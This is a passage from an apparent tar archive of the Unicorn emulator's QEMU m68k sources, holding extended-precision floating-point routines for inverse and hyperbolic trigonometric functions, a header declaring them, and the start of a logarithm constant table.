X'*Y*([B1+Z*(B3+Z*B5)]+[Y*(B2+Z*(B4+Z*B6))]) ?? */ fp0 = floatx80_mul(fp0, fp1, status); fp0 = floatx80_add(fp0, xsave, status); fp1 = packFloatx80(aSign, piby2_exp, pi_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } else { /* |X| < 1/16 */ if (compact < 0x3FD78000) { /* |X| < 2^(-40) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } else { fp0 = a; xsave = a; fp0 = floatx80_mul(fp0, fp0, status); /* Y = X*X */ fp1 = floatx80_mul(fp0, fp0, status); /* Z = Y*Y */ fp2 = float64_to_floatx80(make_float64(0x3FB344447F876989), status); /* B6 */ fp3 = float64_to_floatx80(make_float64(0xBFB744EE7FAF45DB), status); /* B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* Z*B6 */ fp3 = floatx80_mul(fp3, fp1, status); /* Z*B5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FBC71C646940220), status), status); /* B4+Z*B6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0xBFC24924921872F9), status), status); /* B3+Z*B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* Z*(B4+Z*B6) */ fp1 = floatx80_mul(fp1, fp3, status); /* Z*(B3+Z*B5) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FC9999999998FA9), status), status); /* B2+Z*(B4+Z*B6) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0xBFD5555555555555), status), status); /* B1+Z*(B3+Z*B5) */ fp2 = floatx80_mul(fp2, fp0, status); /* Y*(B2+Z*(B4+Z*B6)) */ fp0 = floatx80_mul(fp0, xsave, status); /* X*Y */ /* [B1+Z*(B3+Z*B5)]+[Y*(B2+Z*(B4+Z*B6))] */ fp1 = floatx80_add(fp1, fp2, status); /* X*Y*([B1+Z*(B3+Z*B5)]+[Y*(B2+Z*(B4+Z*B6))]) */ fp0 = floatx80_mul(fp0, fp1, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, xsave, status); float_raise(float_flag_inexact, status); return a; } } } else { aSig &= UINT64_C(0xF800000000000000); aSig |= UINT64_C(0x0400000000000000); xsave = packFloatx80(aSign, aExp, aSig); /* F */ fp0 = a; fp1 = a; /* X */ fp2 = packFloatx80(0, one_exp, one_sig); /* 1 */ fp1 = floatx80_mul(fp1, xsave, status); /* X*F */ fp0 = floatx80_sub(fp0, xsave, status); /* X-F */ fp1 = floatx80_add(fp1, fp2, status); /* 1 + X*F */ fp0 = floatx80_div(fp0, fp1, status); /* U = (X-F)/(1+X*F) */ tbl_index = compact; tbl_index &= 0x7FFF0000; tbl_index -= 0x3FFB0000; tbl_index >>= 1; tbl_index += compact & 0x00007800; tbl_index >>= 11; fp3 = atan_tbl[tbl_index]; fp3.high |= aSign ? 0x8000 : 0; /* ATAN(F) */ fp1 = floatx80_mul(fp0, fp0, status); /* V = U*U */ fp2 = float64_to_floatx80(make_float64(0xBFF6687E314987D8), status); /* A3 */ fp2 = floatx80_add(fp2, fp1, status); /* A3+V */ fp2 = floatx80_mul(fp2, fp1, status); /* V*(A3+V) */ fp1 = floatx80_mul(fp1, fp0, status); /* U*V */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x4002AC6934A26DB3), status), status); /* A2+V*(A3+V) */ fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0xBFC2476F4E1DA28E), status), status); /* A1+U*V */ fp1 = floatx80_mul(fp1, fp2, status); /* A1*U*V*(A2+V*(A3+V)) */ fp0 = floatx80_add(fp0, fp1, status); /* ATAN(U) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp3, status); /* ATAN(X) */ float_raise(float_flag_inexact, status); return a; } } /* * Arc sine */ floatx80 floatx80_asin(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, fp2, one; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF && (uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } compact = floatx80_make_compact(aExp, aSig); if (compact >= 0x3FFF8000) { /* |X| >= 1 */ if (aExp == one_exp && aSig == one_sig) { /* |X| == 1 */ float_raise(float_flag_inexact, status); a = packFloatx80(aSign, piby2_exp, pi_sig); return floatx80_move(a, status); } else { /* |X| > 1 */ float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } } /* |X| < 1 */ user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; one = packFloatx80(0, one_exp, one_sig); fp0 = a; fp1 = floatx80_sub(one, fp0, status); /* 1 - X */ fp2 = floatx80_add(one, fp0, status); /* 1 + X */ fp1 = floatx80_mul(fp2, fp1, status); /* (1+X)*(1-X) */ fp1 = floatx80_sqrt(fp1, status); /* SQRT((1+X)*(1-X)) */ fp0 = floatx80_div(fp0, fp1, status); /* X/SQRT((1+X)*(1-X)) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_atan(fp0, status); /* ATAN(X/SQRT((1+X)*(1-X))) */ float_raise(float_flag_inexact, status); return a; } /* * Arc cosine */ floatx80 floatx80_acos(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, one; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF && (uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aExp == 0 && aSig == 0) { float_raise(float_flag_inexact, status); return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, piby2_exp, pi_sig, 0, status); } compact = floatx80_make_compact(aExp, aSig); if (compact >= 0x3FFF8000) { /* |X| >= 1 */ if (aExp == one_exp && aSig == one_sig) { /* |X| == 1 */ if (aSign) { /* X == -1 */ a = packFloatx80(0, pi_exp, pi_sig); float_raise(float_flag_inexact, status); return floatx80_move(a, status); } else { /* X == +1 */ return packFloatx80(0, 0, 0); } } else { /* |X| > 1 */ float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } } /* |X| < 1 */ user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; one = packFloatx80(0, one_exp, one_sig); fp0 = a; fp1 = floatx80_add(one, fp0, status); /* 1 + X */ fp0 = floatx80_sub(one, fp0, status); /* 1 - X */ fp0 = floatx80_div(fp0, fp1, status); /* (1-X)/(1+X) */ fp0 = floatx80_sqrt(fp0, status); /* SQRT((1-X)/(1+X)) */ fp0 = floatx80_atan(fp0, status); /* ATAN(SQRT((1-X)/(1+X))) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp0, status); /* 2 * ATAN(SQRT((1-X)/(1+X))) */ float_raise(float_flag_inexact, status); return a; } /* * Hyperbolic arc tangent */ floatx80 floatx80_atanh(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, fp2, one; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF && (uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } compact = floatx80_make_compact(aExp, aSig); if (compact >= 0x3FFF8000) { /* |X| >= 1 */ if (aExp == one_exp && aSig == one_sig) { /* |X| == 1 */ float_raise(float_flag_divbyzero, status); return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } else { /* |X| > 1 */ float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } } /* |X| < 1 */ user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; one = packFloatx80(0, one_exp, one_sig); fp2 = packFloatx80(aSign, 0x3FFE, one_sig); /* SIGN(X) * (1/2) */ fp0 = packFloatx80(0, aExp, aSig); /* Y = |X| */ fp1 = packFloatx80(1, aExp, aSig); /* -Y */ fp0 = floatx80_add(fp0, fp0, status); /* 2Y */ fp1 = floatx80_add(fp1, one, status); /* 1-Y */ fp0 = floatx80_div(fp0, fp1, status); /* Z = 2Y/(1-Y) */ fp0 = floatx80_lognp1(fp0, status); /* LOG1P(Z) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp2, status); /* ATANH(X) = SIGN(X) * (1/2) * LOG1P(Z) */ float_raise(float_flag_inexact, status); return a; } /* * e to x minus 1 */ floatx80 floatx80_etoxm1(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, m, m1; floatx80 fp0, fp1, fp2, fp3, l2, sc, onebysc; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(aSign, one_exp, one_sig); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; if (aExp >= 0x3FFD) { /* |X| >= 1/4 */ compact = floatx80_make_compact(aExp, aSig); if (compact <= 0x4004C215) { /* |X| <= 70 log2 */ fp0 = a; fp1 = a; fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x42B8AA3B), status), status); /* 64/log2 * X */ n = floatx80_to_int32(fp0, status); /* int(64/log2*X) */ fp0 = int32_to_floatx80(n, status); j = n & 0x3F; /* J = N mod 64 */ m = n / 64; /* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ m--; } m1 = -m; /*m += 0x3FFF; // biased exponent of 2^(M) */ /*m1 += 0x3FFF; // biased exponent of -2^(-M) */ fp2 = fp0; /* N */ fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0xBC317218), status), status); /* N * L1, L1 = lead(-log2/64) */ l2 = packFloatx80(0, 0x3FDC, UINT64_C(0x82E308654361C4C6)); fp2 = floatx80_mul(fp2, l2, status); /* N * L2, L1+L2 = -log2/64 */ fp0 = floatx80_add(fp0, fp1, status); /* X + N*L1 */ fp0 = floatx80_add(fp0, fp2, status); /* R */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float32_to_floatx80(make_float32(0x3950097B), status); /* A6 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 is S*A6 */ fp3 = floatx80_mul(float32_to_floatx80(make_float32(0x3AB60B6A), status), fp1, status); /* fp3 is S*A5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F81111111174385), status), status); /* fp2 IS A4+S*A6 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3FA5555555554F5A), status), status); /* fp3 is A3+S*A5 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 IS S*(A4+S*A6) */ fp3 = floatx80_mul(fp3, fp1, status); /* fp3 IS S*(A3+S*A5) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FC5555555555555), status), status); /* fp2 IS A2+S*(A4+S*A6) */ fp3 = floatx80_add(fp3, float32_to_floatx80( make_float32(0x3F000000), status), status); /* fp3 IS A1+S*(A3+S*A5) */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 IS S*(A2+S*(A4+S*A6)) */ fp1 = floatx80_mul(fp1, fp3, status); /* fp1 IS S*(A1+S*(A3+S*A5)) */ fp2 = floatx80_mul(fp2, fp0, status); /* fp2 IS R*S*(A2+S*(A4+S*A6)) */ fp0 = floatx80_add(fp0, fp1, status); /* fp0 IS R+S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp2, status); /* fp0 IS EXP(R) - 1 */ fp0 = floatx80_mul(fp0, exp_tbl[j], status); /* 2^(J/64)*(Exp(R)-1) */ if (m >= 64) { fp1 = float32_to_floatx80(exp_tbl2[j], status); onebysc = packFloatx80(1, m1 + 0x3FFF, one_sig); /* -2^(-M) */ fp1 = floatx80_add(fp1, onebysc, status); fp0 = floatx80_add(fp0, fp1, status); fp0 = floatx80_add(fp0, exp_tbl[j], status); } else if (m < -3) { fp0 = floatx80_add(fp0, float32_to_floatx80(exp_tbl2[j], status), status); fp0 = floatx80_add(fp0, exp_tbl[j], status); onebysc = packFloatx80(1, m1 + 0x3FFF, one_sig); /* -2^(-M) */ fp0 = floatx80_add(fp0, onebysc, status); } else { /* -3 <= m <= 63 */ fp1 = exp_tbl[j]; fp0 = floatx80_add(fp0, float32_to_floatx80(exp_tbl2[j], status), status); onebysc = packFloatx80(1, m1 + 0x3FFF, one_sig); /* -2^(-M) */ fp1 = floatx80_add(fp1, onebysc, status); fp0 = floatx80_add(fp0, fp1, status); } sc = packFloatx80(0, m + 0x3FFF, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, sc, status); float_raise(float_flag_inexact, status); return a; } else { /* |X| > 70 log2 */ if (aSign) { fp0 = float32_to_floatx80(make_float32(0xBF800000), status); /* -1 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80( make_float32(0x00800000), status), status); /* -1 + 2^(-126) */ float_raise(float_flag_inexact, status); return a; } else { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; return floatx80_etox(a, status); } } } else { /* |X| < 1/4 */ if (aExp >= 0x3FBE) { fp0 = a; fp0 = floatx80_mul(fp0, fp0, status); /* S = X*X */ fp1 = float32_to_floatx80(make_float32(0x2F30CAA8), status); /* B12 */ fp1 = floatx80_mul(fp1, fp0, status); /* S * B12 */ fp2 = float32_to_floatx80(make_float32(0x310F8290), status); /* B11 */ fp1 = floatx80_add(fp1, float32_to_floatx80( make_float32(0x32D73220), status), status); /* B10 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float32_to_floatx80( make_float32(0x3493F281), status), status); /* B9 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3EC71DE3A5774682), status), status); /* B8 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3EFA01A019D7CB68), status), status); /* B7 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3F2A01A01A019DF3), status), status); /* B6 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F56C16C16C170E2), status), status); /* B5 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3F81111111111111), status), status); /* B4 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FA5555555555555), status), status); /* B3 */ fp3 = packFloatx80(0, 0x3FFC, UINT64_C(0xAAAAAAAAAAAAAAAB)); fp1 = floatx80_add(fp1, fp3, status); /* B2 */ fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, fp0, status); fp2 = floatx80_mul(fp2, fp0, status); fp1 = floatx80_mul(fp1, a, status); fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x3F000000), status), status); /* S*B1 */ fp1 = floatx80_add(fp1, fp2, status); /* Q */ fp0 = floatx80_add(fp0, fp1, status); /* S*B1+Q */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, a, status); float_raise(float_flag_inexact, status); return a; } else { /* |X| < 2^(-65) */ sc = packFloatx80(1, 1, one_sig); fp0 = a; if (aExp < 0x0033) { /* |X| < 2^(-16382) */ fp0 = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x48B0000000000000), status), status); fp0 = floatx80_add(fp0, sc, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, float64_to_floatx80( make_float64(0x3730000000000000), status), status); } else { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, sc, status); } float_raise(float_flag_inexact, status); return a; } } } /* * Hyperbolic tangent */ floatx80 floatx80_tanh(floatx80 a, float_status *status) { flag aSign, vSign; int32_t aExp, vExp; uint64_t aSig, vSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1; uint32_t sign; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return packFloatx80(aSign, one_exp, one_sig); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FD78000 || compact > 0x3FFFDDCE) { /* TANHBORS */ if (compact < 0x3FFF8000) { /* TANHSM */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_move(a, status); float_raise(float_flag_inexact, status); return a; } else { if (compact > 0x40048AA1) { /* TANHHUGE */ sign = 0x3F800000; sign |= aSign ? 0x80000000 : 0x00000000; fp0 = float32_to_floatx80(make_float32(sign), status); sign &= 0x80000000; sign ^= 0x80800000; /* -SIGN(X)*EPS */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80(make_float32(sign), status), status); float_raise(float_flag_inexact, status); return a; } else { fp0 = packFloatx80(0, aExp + 1, aSig); /* Y = 2|X| */ fp0 = floatx80_etox(fp0, status); /* FP0 IS EXP(Y) */ fp0 = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* EXP(Y)+1 */ sign = aSign ? 0x80000000 : 0x00000000; fp1 = floatx80_div(float32_to_floatx80(make_float32( sign ^ 0xC0000000), status), fp0, status); /* -SIGN(X)*2 / [EXP(Y)+1] */ fp0 = float32_to_floatx80(make_float32(sign | 0x3F800000), status); /* SIGN */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp1, fp0, status); float_raise(float_flag_inexact, status); return a; } } } else { /* 2**(-40) < |X| < (5/2)LOG2 */ fp0 = packFloatx80(0, aExp + 1, aSig); /* Y = 2|X| */ fp0 = floatx80_etoxm1(fp0, status); /* FP0 IS Z = EXPM1(Y) */ fp1 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x40000000), status), status); /* Z+2 */ vSign = extractFloatx80Sign(fp1); vExp = extractFloatx80Exp(fp1); vSig = extractFloatx80Frac(fp1); fp1 = packFloatx80(vSign ^ aSign, vExp, vSig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_div(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } /* * Hyperbolic sine */ floatx80 floatx80_sinh(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1, fp2; float32 fact; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact > 0x400CB167) { /* SINHBIG */ if (compact > 0x400CB2B3) { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, 0x8000, aSig, 0, status); } else { fp0 = floatx80_abs(a); /* Y = |X| */ fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x40C62D38D3D64634), status), status); /* (|X|-16381LOG2_LEAD) */ fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x3D6F90AEB1E75CC7), status), status); /* |X| - 16381 LOG2, ACCURATE */ fp0 = floatx80_etox(fp0, status); fp2 = packFloatx80(aSign, 0x7FFB, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp2, status); float_raise(float_flag_inexact, status); return a; } } else { /* |X| < 16380 LOG2 */ fp0 = floatx80_abs(a); /* Y = |X| */ fp0 = floatx80_etoxm1(fp0, status); /* FP0 IS Z = EXPM1(Y) */ fp1 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* 1+Z */ fp2 = fp0; fp0 = floatx80_div(fp0, fp1, status); /* Z/(1+Z) */ fp0 = floatx80_add(fp0, fp2, status); fact = packFloat32(aSign, 0x7E, 0); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, float32_to_floatx80(fact, status), status); float_raise(float_flag_inexact, status); return a; } } /* * Hyperbolic cosine */ floatx80 floatx80_cosh(floatx80 a, float_status *status) { int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact; floatx80 fp0, fp1; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact > 0x400CB167) { if (compact > 0x400CB2B3) { status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, 0x8000, one_sig, 0, status); } else { fp0 = packFloatx80(0, aExp, aSig); fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x40C62D38D3D64634), status), status); fp0 = floatx80_sub(fp0, float64_to_floatx80( make_float64(0x3D6F90AEB1E75CC7), status), status); fp0 = floatx80_etox(fp0, status); fp1 = packFloatx80(0, 0x7FFB, one_sig); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } } fp0 = packFloatx80(0, aExp, aSig); /* |X| */ fp0 = floatx80_etox(fp0, status); /* EXP(|X|) */ fp0 = floatx80_mul(fp0, float32_to_floatx80(make_float32(0x3F000000), status), status); /* (1/2)*EXP(|X|) */ fp1 = float32_to_floatx80(make_float32(0x3E800000), status); /* 1/4 */ fp1 = floatx80_div(fp1, fp0, status); /* 1/(2*EXP(|X|)) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, fp1, status); float_raise(float_flag_inexact, status); return a; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/softfloat.h����������������������������������������������������������0000664�0000000�0000000�00000004353�14675241067�0020405�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Ported from a work by Andreas Grabher for Previous, NeXT Computer Emulator, * derived from NetBSD M68040 FPSP functions, * derived from release 2a of the SoftFloat IEC/IEEE Floating-point Arithmetic * Package. Those parts of the code (and some later contributions) are * provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file will be taken to be licensed under * the Softfloat-2a license unless specifically indicated otherwise. */ /* * Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef TARGET_M68K_SOFTFLOAT_H #define TARGET_M68K_SOFTFLOAT_H #include "fpu/softfloat.h" floatx80 floatx80_mod(floatx80 a, floatx80 b, float_status *status); floatx80 floatx80_getman(floatx80 a, float_status *status); floatx80 floatx80_getexp(floatx80 a, float_status *status); floatx80 floatx80_scale(floatx80 a, floatx80 b, float_status *status); floatx80 floatx80_move(floatx80 a, float_status *status); floatx80 floatx80_lognp1(floatx80 a, float_status *status); floatx80 floatx80_logn(floatx80 a, float_status *status); floatx80 floatx80_log10(floatx80 a, float_status *status); floatx80 floatx80_log2(floatx80 a, float_status *status); floatx80 floatx80_etox(floatx80 a, float_status *status); floatx80 floatx80_twotox(floatx80 a, float_status *status); floatx80 floatx80_tentox(floatx80 a, float_status *status); floatx80 floatx80_tan(floatx80 a, float_status *status); floatx80 floatx80_sin(floatx80 a, float_status *status); floatx80 floatx80_cos(floatx80 a, float_status *status); floatx80 floatx80_atan(floatx80 a, float_status *status); floatx80 floatx80_asin(floatx80 a, float_status *status); floatx80 floatx80_acos(floatx80 a, float_status *status); floatx80 floatx80_atanh(floatx80 a, float_status *status); floatx80 floatx80_etoxm1(floatx80 a, float_status *status); floatx80 floatx80_tanh(floatx80 a, float_status *status); floatx80 floatx80_sinh(floatx80 a, float_status *status); floatx80 floatx80_cosh(floatx80 a, float_status *status); #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/softfloat_fpsp_tables.h����������������������������������������������0000664�0000000�0000000�00000071357�14675241067�0022777�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Ported from a work by Andreas Grabher for Previous, NeXT Computer Emulator, * derived from NetBSD M68040 FPSP functions, * derived from release 2a of the SoftFloat IEC/IEEE Floating-point Arithmetic * Package. Those parts of the code (and some later contributions) are * provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file will be taken to be licensed under * the Softfloat-2a license unless specifically indicated otherwise. */ /* * Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ #ifndef TARGET_M68K_SOFTFLOAT_FPSP_TABLES_H #define TARGET_M68K_SOFTFLOAT_FPSP_TABLES_H static const floatx80 log_tbl[128] = { make_floatx80_init(0x3FFE, 0xFE03F80FE03F80FE), make_floatx80_init(0x3FF7, 0xFF015358833C47E2), make_floatx80_init(0x3FFE, 0xFA232CF252138AC0), make_floatx80_init(0x3FF9, 0xBDC8D83EAD88D549), make_floatx80_init(0x3FFE, 0xF6603D980F6603DA), make_floatx80_init(0x3FFA, 0x9CF43DCFF5EAFD48), make_floatx80_init(0x3FFE, 0xF2B9D6480F2B9D65), make_floatx80_init(0x3FFA, 0xDA16EB88CB8DF614), make_floatx80_init(0x3FFE, 0xEF2EB71FC4345238), make_floatx80_init(0x3FFB, 0x8B29B7751BD70743), make_floatx80_init(0x3FFE, 0xEBBDB2A5C1619C8C), make_floatx80_init(0x3FFB, 0xA8D839F830C1FB49), make_floatx80_init(0x3FFE, 0xE865AC7B7603A197), make_floatx80_init(0x3FFB, 0xC61A2EB18CD907AD), make_floatx80_init(0x3FFE, 0xE525982AF70C880E), make_floatx80_init(0x3FFB, 0xE2F2A47ADE3A18AF), make_floatx80_init(0x3FFE, 0xE1FC780E1FC780E2), make_floatx80_init(0x3FFB, 0xFF64898EDF55D551), make_floatx80_init(0x3FFE, 0xDEE95C4CA037BA57), make_floatx80_init(0x3FFC, 0x8DB956A97B3D0148), make_floatx80_init(0x3FFE, 0xDBEB61EED19C5958), make_floatx80_init(0x3FFC, 0x9B8FE100F47BA1DE), make_floatx80_init(0x3FFE, 0xD901B2036406C80E), make_floatx80_init(0x3FFC, 0xA9372F1D0DA1BD17), make_floatx80_init(0x3FFE, 0xD62B80D62B80D62C), make_floatx80_init(0x3FFC, 0xB6B07F38CE90E46B), 